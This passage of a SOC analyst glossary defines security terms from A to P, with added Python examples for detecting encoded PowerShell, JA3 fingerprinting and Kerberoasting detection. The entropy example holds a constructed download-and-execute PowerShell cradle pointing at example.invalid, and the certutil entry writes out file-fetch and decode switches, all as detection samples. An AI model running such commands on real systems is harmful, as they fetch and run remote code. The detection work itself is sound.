SHARED VOCABULARY

The C.L.E.A.R. Glossary

Common Lexicon of Essential Analyst References.

The plain-language definitions for the words analysts use most. Alphabetized, searchable, and shareable. When two people on a call mean different things by “scope” or “alert,” this is the page to settle it.


A

Access Control
Rules and procedures that regulate who can access certain systems, data, or resources.
Access Pattern
The way a user or system interacts with resources, such as login times, frequency of access, and volume of data transferred.
Advanced Persistent Threats (APTs)
Sophisticated cyber attackers, often state-sponsored, who gain and maintain unauthorized access to networks for extended periods while avoiding detection.
AI/ML (Artificial Intelligence / Machine Learning)
Technologies that enable systems to learn from and make decisions based on data, used in security for threat detection, pattern recognition, and automated response.
Alert
An automated notification produced when detection logic decides an event might be malicious, anomalous, or in violation of policy. The detection engine’s hypothesis, not a verdict; the analyst makes the call.
Alert De-duplication
The process of consolidating multiple identical or related alerts into a single notification to reduce noise and improve analyst efficiency.
Alert Fatigue
The desensitization of security analysts to alerts due to high volumes of notifications, potentially leading to missed critical threats.
Alert Parsing
The systematic process of breaking down and analyzing the components of a security alert to understand its technical details and significance.
Alert Validation
The step where an alert is examined and confirmed as legitimate or false-positive before initiating further investigation or response.
Analyst Burnout
Physical and mental exhaustion experienced by security analysts due to high-stress environments, constant alert monitoring, and pressure to maintain security.
Anomaly
An observation that deviates from an established baseline. Anomalies are statistical, not malicious; an analyst still has to decide whether the deviation matters.
Anomaly-Based Detection
A security detection method that identifies suspicious activity by comparing current behavior against established baselines of normal activity.
Application-Layer Protocol
Network protocols that operate at Layer 7 of the OSI model, dealing with application-specific communication (HTTP, SMTP, DNS).
Application Programming Interface (API)
A set of rules and protocols that allows different software systems to communicate with each other.
Arbitrary Commands
Unauthorized commands that an attacker can execute on a compromised system, often with the same privileges as the compromised application.
Artifacts
Digital evidence or traces left behind by system activity or security incidents, used in forensic analysis and incident investigation.
Asset
Something the organization owns, depends on, or is accountable for: data, a system, an identity, a credential, or a service. An asset’s criticality is what turns a generic alert into a prioritized one.
Asset Criticality
The level of importance or sensitivity of an asset, which determines the level of protection it requires.
Asset Role
The defined function or purpose of an asset within an organization, helping prioritize its security importance.
ASSURED Methodology
A structured approach to event triage in security operations, comprising seven phases: Alert, Subject, Scope, Uncover, Risk, Escalation, and Documentation.
Attack Chain
The ordered sequence of steps an attacker takes from initial access through their objective. Useful as a framework (Lockheed Martin’s Kill Chain, MITRE ATT&CK’s tactics) because it lets defenders intervene at any link, not only the first.
Attack Patterns
Common techniques or behaviors used by attackers that help in recognizing and defending against threats.
Attack Vector
The entry point an attacker uses to reach a target: a phishing email, an exposed RDP port, a third-party vendor with trusted access, a misconfigured cloud bucket. Each vector implies a different control to harden.
Attribute-Based Access Control (ABAC)
Restricts access based on user attributes, environment conditions, and resource characteristics to enforce fine-grained security policies.
Authentication
Proving who you are to a system: a password, a hardware token, a biometric, a certificate. Distinct from authorization, which is what that identity is then allowed to do.
Authorization
The process of granting or denying access to resources based on a user’s or system’s identity and permissions.
Automation
The use of technology to perform security tasks with minimal human intervention, including alert triage, incident response, and threat hunting.
Autonomous System Number (ASN)
A unique identifier assigned to an internet network used for routing traffic between networks.

B

Base64 Encoding
A binary-to-text encoding that represents arbitrary bytes with a 64-character alphabet. It is an encoding, not encryption: anyone can reverse it, so attackers use it to hide payloads and commands from casual inspection and naive string matching, not to protect them.
Baselining
The process of documenting and measuring normal system behavior over time to identify deviations that might indicate security issues.
Behavior Analytics
The process of collecting and analyzing user and system behavior patterns to identify potential security threats or anomalies.
Behavioral Drift
Gradual changes in normal behavior patterns that may complicate detection of anomalies.
Biometric Verification
Authentication method that uses unique biological characteristics like fingerprints or facial recognition.
BITSAdmin
A command-line tool for managing Background Intelligent Transfer Service (BITS), often monitored for abuse by attackers.
Blockchain
A distributed ledger technology that maintains a secure, decentralized record of transactions, introducing new security considerations for digital assets and smart contracts.
Border Gateway Protocol (BGP)
The protocol managing how packets are routed across the internet between autonomous systems.
Bring Your Own Device (BYOD)
A policy allowing employees to use personal devices for work, which introduces unique security challenges.
Business Continuity
The ability of an organization to continue operating and providing services despite disruptions or disasters.
Byte Sequence
An ordered set of bytes in memory or data streams, often analyzed in malware detection or forensics.

C

California Consumer Privacy Act (CCPA)
A law that regulates the collection, use, and protection of personal data in California.
Cardholder Data Environment (CDE)
Systems and networks that store, process, or transmit payment card data and must comply with PCI DSS requirements.
certutil.exe
A built-in Windows certificate-management tool that doubles as a living-off-the-land binary: attackers use it to fetch files (certutil -urlcache -split -f <url>) and to decode Base64-wrapped payloads (certutil -decode). Those switches in a command line outside of certificate administration merit a look.
CIA Triad
Core principles of information security: Confidentiality, Integrity, and Availability.
Cloud Security Posture Management (CSPM)
Tools and processes that continuously monitor cloud infrastructure for misconfigurations, compliance violations, and security risks.
Command and Control (C2)
Infrastructure used by attackers to communicate with and control compromised systems within a target network.
Command Line
In SOC analysis, the argument string a process was launched with. Often the load-bearing forensic field on an EDR alert because it reveals what the process was actually told to do.
Command Line Analysis
The examination of command-line parameters, arguments, and execution context to understand process behavior and intent.
Common Event Format (CEF)
A standardized log format designed to simplify event management across security devices and systems.
Common Vulnerability Scoring System (CVSS)
A standardized way to assess the severity of security vulnerabilities.
Compliance
Adherence to regulatory requirements, industry standards, and security frameworks that govern data protection and system security.
Concatenation
The process of combining multiple strings or commands, often used by attackers to bypass security controls or obfuscate malicious code.
Conditional Logic
Programming or rule-based logic that executes actions based on specific conditions or criteria.
Configuration Management
The process of tracking and controlling changes to systems, networks, and applications.
Configuration Management Database (CMDB)
Repositories that store information about IT assets and their relationships to support change and incident management.
Container Orchestration
Automated management, scaling, and deployment of containerized applications using platforms like Kubernetes.
Containers
Lightweight, standalone packages that include everything needed to run a piece of software, introducing unique security challenges in orchestration and isolation.
Containment
The incident-response phase between detection and eradication: isolate the affected hosts, revoke the compromised credentials, block the C2 destinations, freeze the situation so it stops getting worse while the investigation continues.
Credential
Whatever the system accepts as proof of identity: a password, an API key, an OAuth token, a Kerberos ticket, an NTLM hash. Credentials are the highest-value loot in most intrusions; their theft is usually the pivot point.
Critical Infrastructure
Essential systems, networks, or assets that are critical to an organization’s operations or national security.
Cross-System
Interactions or communications that occur between different systems or platforms within an infrastructure.
Cybercriminals
Individuals or groups who use technology to commit crimes, including data theft, fraud, and system compromise for financial gain.

D

Data Aggregation
The process of collecting and combining data from multiple sources for analysis, potentially revealing security patterns or threats not visible in isolated data sets.
Data Breach
The unauthorized access, theft, or exposure of sensitive data.
Data Exfiltration
The unauthorized transfer of data from a computer or network to an external location or system.
Data Integrity
Ensuring data is accurate, complete, and unaltered during storage, processing, and transmission.
Data Loss Prevention (DLP)
A set of tools and processes that help prevent sensitive data from being lost, stolen, or compromised.
Data Protection
The processes and technologies used to protect sensitive data from unauthorized access, theft, or damage.
Data Retention
The policies and procedures that govern how long data is stored and retained.
Deception Technology
Security tools and techniques that deploy decoys and traps to detect, deflect, and analyze unauthorized system access attempts.
Deep Packet Inspection (DPI)
A technique used to inspect and analyze network traffic to detect and block malicious activity.
Detection Logic
The rule, model, or heuristic that decides whether a given input fires an alert. The logic that produced the alert matters as much as the alert it produced; two engines can name the same alert for very different reasons.
Detection Mechanism
Tools or methods employed to identify security incidents, including signature, anomaly, and behavioral detections.
Device Fingerprint
A unique identifier derived from hardware or software characteristics used to recognize devices.
Digital Forensics
The analysis and examination of digital evidence to investigate and solve crimes or security incidents.
Digital Signatures
Cryptographic techniques that validate the authenticity and integrity of digital messages or documents.
Disaster Recovery
The process of restoring systems, networks, and operations after a disaster or major disruption.
Distributed Denial-of-Service (DDoS)
A type of attack where multiple systems are used to flood a targeted system or network with traffic in an attempt to overwhelm it.
Distribution Pipelines
Processes and tools used to deploy software or updates from development to production environments.
DLL Loading
The process of loading Dynamic Link Libraries into a program’s memory space, which can be exploited by attackers for malicious code execution.
Domain
A unique name or identifier for a system, network, or organization on the internet.
Domain Admin
The most powerful account class in a Windows Active Directory domain: full administrative control over every domain-joined host, every domain user, and the directory itself. Compromise of a Domain Admin account is generally treated as a domain compromise.
Domain-based Message Authentication, Reporting, and Conformance (DMARC)
An email authentication policy layered on SPF and DKIM. The domain owner publishes a DNS TXT record at _dmarc.<domain> stating how receivers should treat mail that fails alignment (none, quarantine, reject) and where to send aggregate reports. Its purpose is to stop exact-domain spoofing of the visible From header; it does nothing against look-alike domains.
Domain Controller
A server that responds to security authentication requests in a Windows domain environment.
Domain Depth
The hierarchical level or complexity within a domain namespace or network structure.
DomainKeys Identified Mail (DKIM)
An email authentication method in which the sending domain signs selected headers and the body with a private key. Receivers fetch the matching public key from DNS (<selector>._domainkey.<domain>) to verify that the signed parts were not altered in transit and that the signing domain vouched for the message.
Domain Name System (DNS)
A system that translates domain names into IP addresses.
Domain Name System Exfiltration
A technique where data is covertly sent out of a network inside DNS queries, typically chunked and encoded into the subdomain labels of a domain whose authoritative server the attacker controls. It works because recursive resolvers are usually allowed outbound even when other egress is blocked; unusually long or high-entropy labels and high query volume to one domain are the tells.
Domain Name System Query
A request sent to a DNS server to resolve a domain name into an IP address.
Domain Trusts
Relationships established between domains to allow resource sharing and authentication.
Dynamic Link Library (DLL)
A collection of executable functions or data that can be used by multiple programs.
Dynamic Prioritization
Adaptive adjustment of alert or incident priority based on contextual risk factors.

E

Electron Framework
An open-source framework for building cross-platform desktop applications using web technologies.
Encoded Payloads
Malicious code or commands that have been transformed into a different format to avoid detection or bypass security controls.
Encryption
The process of converting plaintext data into unreadable ciphertext to protect it from unauthorized access.
Endpoint
A device that initiates network connections and runs user-facing software: laptop, desktop, server, phone, tablet. Endpoints are where most adversary tradecraft eventually shows up, which is why EDR exists.
Endpoint Detection and Response (EDR)
Security technology that continuously monitors and responds to threats on endpoint devices, providing advanced threat detection and incident response capabilities.
Endpoint Security
The processes and technologies used to protect endpoint devices from security threats.
Enterprise
A large organization or business that operates in multiple locations or countries.
Entitlement Matrix
A framework mapping user roles to their access permissions within systems.
Entity
A person, system, or organization that interacts with or affects a security incident.
Entropy Scoring
Measuring the randomness of a string or file (usually Shannon entropy, in bits per symbol) to flag obfuscated, encoded, packed, or encrypted content. Natural-language text and source code score low; Base64 blobs, ciphertext, and packed binaries score high. Entropy alone is a weak signal, so it is normally combined with length and context.
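An added example (not code from the glossary's authors) that ties together Base64 Encoding, Command Line Analysis, Encoded Payloads and Entropy Scoring: it computes Shannon entropy over a command line's arguments and decodes a PowerShell -EncodedCommand argument, which is Base64 of UTF-16LE script text. The command lines and the download-cradle payload are constructed for the example; the thresholds are assumptions to tune against your own baseline.

```python
"""Entropy scoring and -EncodedCommand decoding over sample command lines.

Added example, not code from the glossary's authors. The command lines
below are constructed; the decoder targets PowerShell's -EncodedCommand
switch, whose argument is Base64 of UTF-16LE script text.
"""
import base64
import binascii
import math
from collections import Counter
from typing import Dict, Optional


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character; 0.0 for empty or single-symbol input."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def _is_encoded_command_switch(token: str) -> bool:
    """PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus
    the alias -ec, with either - or / as the switch character, case-insensitive."""
    if token[0] not in "-/":
        return False
    name = token[1:].lower()
    return bool(name) and (name == "ec" or "encodedcommand".startswith(name))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from the first -EncodedCommand argument, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_command_switch(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def score_command_line(cmdline: str, entropy_threshold: float = 4.5,
                       min_length: int = 32) -> Dict[str, object]:
    """Flag a command line when it carries a decodable encoded command or a long,
    high-entropy argument (a crude but useful proxy for packed or encoded data).
    The threshold and minimum length are assumed starting points, not tuned values."""
    args = cmdline.split()[1:]
    longest = max(args, key=len) if args else ""
    entropy = shannon_entropy(longest)
    high_entropy = len(longest) >= min_length and entropy >= entropy_threshold
    decoded = decode_encoded_command(cmdline)
    return {
        "longest_arg_entropy": round(entropy, 2),
        "high_entropy_arg": high_entropy,
        "decoded_payload": decoded,
        "suspicious": decoded is not None or high_entropy,
    }


# Constructed samples: one encoded download cradle, one ordinary admin invocation.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + ENCODED,
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(score_command_line(line))
```

Two practical points the code encodes: PowerShell accepts abbreviated switches, so a rule that only matches the literal string -EncodedCommand misses -e and -enc; and the decoded text, not the blob's entropy, is what the analyst needs, since Base64 of UTF-16LE text is full of repeated padding characters and does not always score as high as one might expect.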
Ephemeral Computing
A computing model where resources, such as containers or serverless functions, are temporary and exist only for the duration of a specific task or process.
Eradication
The phase of incident response focused on completely removing threat actors and malicious artifacts from affected systems.
Escalation Matrix
A predetermined framework defining when and how to elevate security incidents to higher levels of response based on severity and impact.
Evasion
Techniques used by attackers to avoid detection by security tools.
Event
An observable thing that happened: a process executed, a user logged in, a file changed, a packet was sent. Events are what detection logic consumes; it raises an alert on the few it finds interesting. Most events never become alerts, and every alert traces back to one or more events.
Event Context
The circumstances and environment surrounding a security event.
Event Correlation
The process of analyzing multiple events across different sources to identify relationships and determine if they are part of a larger security incident.
Event Triage
The phase that sits between detection and incident response: deciding whether an alert is real, whom it concerns, what its blast radius might be, and whether it crosses an escalation threshold. The ASSURED methodology is a structured way to do triage.
Excessive Permissions
User or process privileges beyond what is necessary for their role, increasing security risk.
Exfiltration
The unauthorized transfer of data from a system or network, often as part of a data breach or espionage operation.
Exploit
A technique or piece of code that turns a vulnerability into actual capability: remote code execution, privilege escalation, authentication bypass. A vulnerability without an exploit is theoretical; a vulnerability with one is operational.

F

False Positive
A security alert that fires on activity that is, on inspection, benign. The detection logic matched a pattern that looked malicious but was not. Distinct from a benign true positive, which is real adversary-like activity that does not warrant action in the local context.
False-Premise
An incorrect assumption or conclusion about a security event that leads to improper investigation or response.
Federation
A system allowing users to access multiple independent systems using a single set of credentials.
Feedback Loop
A process where information from outcomes is used to improve future detection or response.
FIDO2
An authentication standard (W3C WebAuthn plus the CTAP protocol between browser and authenticator) for passwordless, phishing-resistant login. The authenticator holds a per-site key pair and signs a challenge bound to the site's origin, unlocked locally by a PIN or biometric; no shared secret leaves the device, so a look-alike site gets nothing replayable.
File Integrity Monitoring (FIM)
A security control that detects unauthorized changes to files or configurations.
Firewall
A network security system that controls and monitors incoming and outgoing traffic based on predetermined security rules.
Forensics
The application of scientific methods to collect, preserve, and analyze digital evidence for security investigations and incident response.
Framework
A structured approach or set of guidelines used to build security programs or processes.
Fully Qualified Domain Name (FQDN)
The complete domain name specifying its exact location in the DNS hierarchy.

G

General Data Protection Regulation (GDPR)
European Union regulation establishing requirements for processing and protecting personal data, with specific security and breach notification requirements.
Geolocation
The process of determining the physical location of a device or IP address.

H

Hashes
Fixed-size digests produced by a cryptographic hash function (MD5, SHA-1, SHA-256) from arbitrary input. The same input always yields the same digest and a one-bit change yields an unrelated one, which makes hashes useful for file integrity verification and as atomic malware indicators. The caveat is the same property in reverse: a one-byte change to a sample defeats a hash-based match.
Health Insurance Portability and Accountability Act (HIPAA)
U.S. legislation that sets standards for protecting sensitive patient health information, including specific security and privacy requirements.
Heuristic Detection
A detection method that uses rules and patterns to identify potentially malicious behavior based on common characteristics of malware or attacks.
Honeypot
A decoy system designed to lure attackers and study their tactics.
HTA Content
HTML Application files that can execute scripts, sometimes abused for malicious purposes.
Hybrid Infrastructure
Computing environment that combines on-premises, private cloud, and public cloud services.
Hypertext Transfer Protocol (HTTP)
The foundation protocol for data communication on the web; cleartext, so anyone on the path can read or alter requests and responses.
Hypertext Transfer Protocol Secure (HTTPS)
HTTP carried over TLS: encrypts data in transit and authenticates the server by its certificate. It says nothing about whether the server itself is trustworthy; phishing and C2 sites use it too.

I

Impact
The potential effect or damage caused by a security incident.
Incident
A confirmed compromise of confidentiality, integrity, or availability: an alert (or series of alerts) that triage has validated as real adversary activity, warranting an IR response. An event becomes an incident at the verdict, not at the alert.
Incident Command
A structured leadership model used to manage complex security incidents.
Incident Response
The organized approach to addressing and managing the aftermath of a security breach or cyberattack, including preparation, detection, analysis, containment, eradication, and recovery.
Indicators of Compromise (IoC)
Atomic, replayable artifacts that, when observed, suggest an intrusion has occurred or is in progress: file hashes, IPs, domains, registry keys, certificate fingerprints, and similar discrete observables. Behavioral patterns (process trees, sequence of actions) are not IoCs; they live one layer up as TTPs.
Information Security
The practices and technologies used to protect information and data from unauthorized access, use, disclosure, disruption, modification, or destruction.
Information Sharing and Analysis Centers (ISACs)
Industry groups that share cyber threat information.
Information Technology Service Management (ITSM)
Frameworks and tools to manage IT services and processes.
Infrastructure
The underlying systems, networks, and architecture that support an organization’s operations.
Insider Risk
The potential for harm from individuals with legitimate access arising from mistakes, policy violations, or unsafe habits, not from intent. Distinct from insider threat, which is deliberate.
Insider Threats
Personnel with authorized access who intentionally or unintentionally pose a risk to organizational security through misuse, theft, or sabotage.
Insider Threat Matrix
A framework for categorizing and understanding different types of insider threats based on motivation, access level, and potential impact.
Integrated Development Environment (IDE)
Software that provides comprehensive facilities to programmers.
Intelligence
Information gathered and analyzed to understand and predict potential security threats.
IntelliSense
A code-completion aid commonly found in development environments.
Inter-Process Communication
Mechanisms that allow different processes to communicate within an operating system.
Internet of Things (IoT)
Network of physical devices embedded with sensors, software, and connectivity, introducing new security challenges due to their often limited security capabilities.
Internet Protocol (IP) Address
A unique address assigned to a device or system on a network.
Intrusion Detection System (IDS)
Security system that monitors network traffic for suspicious activity and policy violations, generating alerts for potential security incidents.
Intrusion Prevention System (IPS)
Security system that not only detects but actively blocks or prevents identified suspicious activity and policy violations.
Isolated Execution Environment
A secure area where code runs isolated from other system components to prevent interference.
Isolation Forests
A machine learning algorithm used for anomaly detection by isolating anomalies in data.

J

JA3
A method for fingerprinting TLS client software: the decimal values of the TLS version, cipher suites, extensions, elliptic curves and EC point formats from the Client Hello are concatenated into one string (fields separated by commas, values by hyphens, GREASE values dropped) and MD5-hashed. The same client library yields the same hash whatever the destination, so JA3 identifies tooling rather than servers; it also collides across unrelated applications that share a TLS stack, so treat a hash match as a lead, not an attribution.
JA3S
The server-side counterpart to JA3: the TLS version, the single chosen cipher suite and the extensions from the Server Hello, hashed the same way. Paired with JA3 it fingerprints a client-server combination, which is useful for spotting C2 handshakes that a client hash alone would not single out.
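An added example (not code from the glossary's authors or from the JA3 project) showing how the JA3 and JA3S strings are assembled from already-parsed hello fields and why GREASE filtering matters. The hello contents are constructed; the string layout and the MD5 step follow the published JA3 format.

```python
"""JA3 and JA3S fingerprint construction from parsed TLS hello fields.

Added example, not code from the glossary's authors or from the JA3
project itself. Field values in the sample hellos are constructed;
the string layout (decimal values, '-' within a field, ',' between
fields, GREASE dropped) and the MD5 step follow the published JA3 format.
"""
import hashlib
from typing import Iterable, Sequence


def is_grease(value: int) -> bool:
    """RFC 8701 GREASE values look like 0x?a?a (0x0a0a, 0x1a1a, ..., 0xfafa).
    Clients randomise them per connection, so JA3 excludes them."""
    return (value & 0x0F0F) == 0x0A0A


def _join(values: Iterable[int]) -> str:
    return "-".join(str(v) for v in values if not is_grease(v))


def ja3_string(version: int, ciphers: Sequence[int], extensions: Sequence[int],
               curves: Sequence[int], point_formats: Sequence[int]) -> str:
    """Client Hello: legacy version, cipher suites, extension types,
    supported groups (curves), EC point formats, all in wire order."""
    return ",".join([str(version), _join(ciphers), _join(extensions),
                     _join(curves), _join(point_formats)])


def ja3_hash(version, ciphers, extensions, curves, point_formats) -> str:
    s = ja3_string(version, ciphers, extensions, curves, point_formats)
    return hashlib.md5(s.encode("ascii")).hexdigest()


def ja3s_string(version: int, cipher: int, extensions: Sequence[int]) -> str:
    """Server Hello: version, the single selected cipher suite, extension types."""
    return ",".join([str(version), str(cipher), _join(extensions)])


def ja3s_hash(version: int, cipher: int, extensions: Sequence[int]) -> str:
    return hashlib.md5(ja3s_string(version, cipher, extensions).encode("ascii")).hexdigest()


# Constructed Client Hello with GREASE entries sprinkled in, as browsers do.
SAMPLE_CLIENT_HELLO = {
    "version": 771,  # 0x0303; the legacy_version field even for TLS 1.3 clients
    "ciphers": [0x1A1A, 4865, 4866, 4867, 49195, 49199, 156, 47, 53],
    "extensions": [0x2A2A, 0, 23, 65281, 10, 11, 35, 16, 5, 13, 0x3A3A],
    "curves": [0x4A4A, 29, 23, 24],
    "point_formats": [0],
}
# The same hello with GREASE stripped; it must fingerprint identically.
SAMPLE_CLIENT_HELLO_NO_GREASE = {
    "version": 771,
    "ciphers": [4865, 4866, 4867, 49195, 49199, 156, 47, 53],
    "extensions": [0, 23, 65281, 10, 11, 35, 16, 5, 13],
    "curves": [29, 23, 24],
    "point_formats": [0],
}
# Constructed Server Hello picking TLS_AES_256_GCM_SHA384 (4866).
SAMPLE_SERVER_HELLO = {"version": 771, "cipher": 4866, "extensions": [43, 51]}

if __name__ == "__main__":
    print(ja3_string(**SAMPLE_CLIENT_HELLO), ja3_hash(**SAMPLE_CLIENT_HELLO))
    print(ja3s_string(**SAMPLE_SERVER_HELLO), ja3s_hash(**SAMPLE_SERVER_HELLO))
```

In production the parsing is done by a sensor (Zeek, Suricata and most NDR products emit the hash directly); what this shows is that the fingerprint is order-sensitive and GREASE-insensitive, so two captures of the same client that differ only in the randomised GREASE bytes still match.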

K

Kerberoasting
Requesting Kerberos service tickets (TGS) for accounts that have Service Principal Names (SPNs) and cracking them offline. Part of each ticket is encrypted under a key derived from the service account’s password (the account’s NT hash itself when RC4, etype 23, is negotiated), so a weak service-account password becomes crackable ciphertext, and any authenticated domain user can request the ticket. Machine accounts are poor targets because their passwords are long and random; human-created service accounts with SPNs are the usual victims.
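An added detection example (not code from the glossary's authors) run over constructed records shaped like Windows Security event 4769 (service ticket requested). It uses the two signals a SOC normally pairs: a ticket that negotiated RC4 for a user-style service account, and one account requesting tickets for many distinct services in a short window. Field names follow the event's EventData; the values, the window and the threshold are assumptions.

```python
"""Kerberoasting detection over sample Windows Security event 4769 records.

Added example, not code from the glossary's authors. The records below are
constructed to look like 4769 EventData fields (names as Windows emits
them, values made up). Two signals are used: a service-ticket request that
negotiated RC4 (etype 0x17) for a user-style service account, and one
account requesting tickets for many distinct services in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = 0x17  # etype 23: ticket encrypted under the service account's NT hash

SAMPLE_4769: List[Dict[str, str]] = [
    {"TimeCreated": "2024-05-01T09:00:01", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.1.2.3"},
    {"TimeCreated": "2024-05-01T09:00:05", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.1.2.3"},
    {"TimeCreated": "2024-05-01T09:00:07", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "10.1.2.9"},
    {"TimeCreated": "2024-05-01T09:00:30", "TargetUserName": "WS01$@CORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x17", "IpAddress": "10.1.2.50"},
    {"TimeCreated": "2024-05-01T09:01:10", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.1.2.3"},
    {"TimeCreated": "2024-05-01T11:30:00", "TargetUserName": "carol@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.1.3.4"},
]


def _etype(value: str) -> int:
    """4769 logs the encryption type as a hex string such as 0x17."""
    return int(value, 16) if value.lower().startswith("0x") else int(value)


def _crackable_service(name: str) -> bool:
    """Machine accounts (trailing $) have random 120-char passwords and krbtgt is
    not a roasting target, so only user-style service accounts are interesting."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_service_ticket_requests(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Signal 1: RC4 tickets for crackable services. Each one is worth a look on its
    own in a domain where AES is the norm; legacy apps will need baselining."""
    return [e for e in events
            if _crackable_service(e["ServiceName"])
            and _etype(e["TicketEncryptionType"]) == RC4_HMAC]


def kerberoast_bursts(events: List[Dict[str, str]], min_services: int = 3,
                      window: timedelta = timedelta(minutes=5)) -> List[Dict[str, object]]:
    """Signal 2: one requester pulling tickets for many distinct services within
    `window`, the pattern left by tools that roast every SPN in one sweep."""
    by_user = defaultdict(list)
    for e in rc4_service_ticket_requests(events):
        by_user[e["TargetUserName"]].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    findings = []
    for user, reqs in by_user.items():
        reqs.sort()
        for start, _ in reqs:  # slide the window from each request
            services = {svc for t, svc in reqs if start <= t <= start + window}
            if len(services) >= min_services:
                findings.append({"user": user, "start": start.isoformat(),
                                 "services": sorted(services)})
                break
    return findings


if __name__ == "__main__":
    for f in kerberoast_bursts(SAMPLE_4769):
        print(f)
```

The exclusions are where the value is: without the trailing-dollar filter, every workstation authenticating to a file server would fire, and without the burst logic a single legacy application that still negotiates RC4 would page someone every day. The durable fix on the identity side is long random passwords (or group Managed Service Accounts) for anything that carries an SPN, plus AES-only encryption types.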
Kerberos
A network authentication protocol using tickets to allow secure identity verification.
Kubernetes
An open-source system for automating deployment, scaling, and management of containerized applications.

L

Lateral Movement
Adversary traversal from the initial-access host to other hosts inside the environment. Each hop expands the blast radius and adds new entities for Subject analysis. Often piggybacks on legitimate authentication, which is what makes it hard to detect.
Least Privilege
The principle of granting users or systems only the necessary permissions and access to perform their tasks.
Legacy Systems
Outdated technology or systems that remain in use, often with security vulnerabilities.
Lessons Learned
Insights gained from past incidents or activities to improve future security posture.
Likelihood
The probability that a threat will exploit a vulnerability.
Liveness Detection
Techniques used to verify that biometric inputs are from a live person, not a spoof.
Living-Off-The-Land (LotL)
Attack technique utilizing legitimate, built-in system tools and features to conduct malicious activities while evading detection.
Log
A record of events, transactions, or activities in a system or network.
Log Parsing
The systematic process of analyzing and extracting relevant information from system, application, and security logs for investigation and threat detection.
LSTM (Long Short-Term Memory) Networks
A type of recurrent neural network that retains state across long sequences, useful for anomaly detection over ordered data such as log streams, user sessions, or network flows where what matters is the sequence, not any single event.

M

Machine Learning
The use of algorithms and statistical models that enable computer systems to improve their performance on a specific task through experience.
Malware
Software whose author intends harm: ransomware, trojans, worms, viruses, spyware, wipers, rootkits, RATs. The B.A.D. glossary catalogs the families in detail.
Mandatory Access Control
An access policy where permissions are centrally controlled and enforced based on classifications.
MD5
A widely used hash function that produces a 128-bit digest. Practical collision attacks exist, so it is unfit for signatures or any integrity check an adversary might want to defeat; it survives in security tooling only as a lookup key for known samples, where collision resistance is not what is being relied on.
Mean Time To Respond/Resolve (MTTR)
A metric measuring how quickly incidents are resolved.
Metadata
Data about data: file timestamps, owner, size, hash; an email’s headers; a process’s parent, command line, and signing certificate. In triage, metadata is often more diagnostic than the content itself.
Methodology
A systematic framework or approach for conducting security operations or investigations.
Middleware
Software that connects different applications or systems to enable communication and data exchange.
Mitigation
Action that reduces a risk without eliminating it: a compensating control, a workaround, a temporary block. Distinct from remediation, which fixes the underlying issue.
MITRE ATT&CK
A globally-accessible knowledge base of adversary tactics and techniques based on real-world observations, used for threat modeling and security operations.
MITRE Procedures
Specific implementation methods used by threat actors to accomplish techniques within the ATT&CK framework.
MITRE Tactics
Categories representing the tactical goals of adversaries during an attack, such as initial access, execution, persistence.
MITRE Techniques
Specific methods used by adversaries to achieve tactical goals within the ATT&CK framework.
Model Training
The process of teaching a machine learning model to recognize patterns using labeled data.
Mshta.exe
A Windows utility for executing Microsoft HTML Applications, sometimes exploited by attackers.
Multi-Cloud Environment
Infrastructure utilizing multiple cloud service providers, introducing complex security challenges in maintaining consistent security controls and visibility.
Multi-Factor Authentication (MFA)
Security system requiring two or more verification methods to grant access, combining something you know, have, or are.

N

Nested Data
Data structures where elements contain other data structures, common in logs and JSON.
Network
A collection of interconnected devices, systems, or servers that communicate with each other.
Network Access Control (NAC)
Security solutions that enforce policies on devices trying to access a network.
Network Segmentation
The division of a network into smaller, isolated segments to improve security and reduce the attack surface.
Network Traffic
The flow of data between devices, systems, or servers on a network.
Node
A device or system that is connected to a network.
Normalization
The process of transforming data into a standard format to improve analysis and comparison.

O

Obfuscation
Techniques used to make code, commands, or data difficult to understand or detect, used both by attackers and legitimately for IP protection.
OpenC2
An open standard for command and control of cyber defense components.
Oracle Cluster File System (OCFS)
A shared file system used in clustered environments.
Organizationally Unique Identifier (OUI)
The first 24 bits of a MAC address that identify the manufacturer.
Orphaned Credentials
Access credentials no longer associated with an active user or process, posing a security risk.
OSA Model
Open Security Architecture model used for designing security frameworks.

P

Packet Capture Files (PCAP)
Files used to record network traffic for analysis.
Parsing
The process of analyzing data structures or code to extract meaningful information.
Pass-The-Hash
An attack technique that allows an attacker to authenticate to a remote server/service using the underlying NTLM or LM hash of a user’s password instead of the password itself.
Password
A secret word or phrase used to authenticate a user or system.
Patch Management
The process of applying updates and fixes to software and systems to repair vulnerabilities and improve security.
Payment Card Industry Data Security Standard (PCI DSS)
Security standards designed to ensure companies that accept, process, store, or transmit credit card information maintain a secure environment.
Peer Validation
A method of verifying information or alerts through cross-checking with other sources.
Penetration Testing
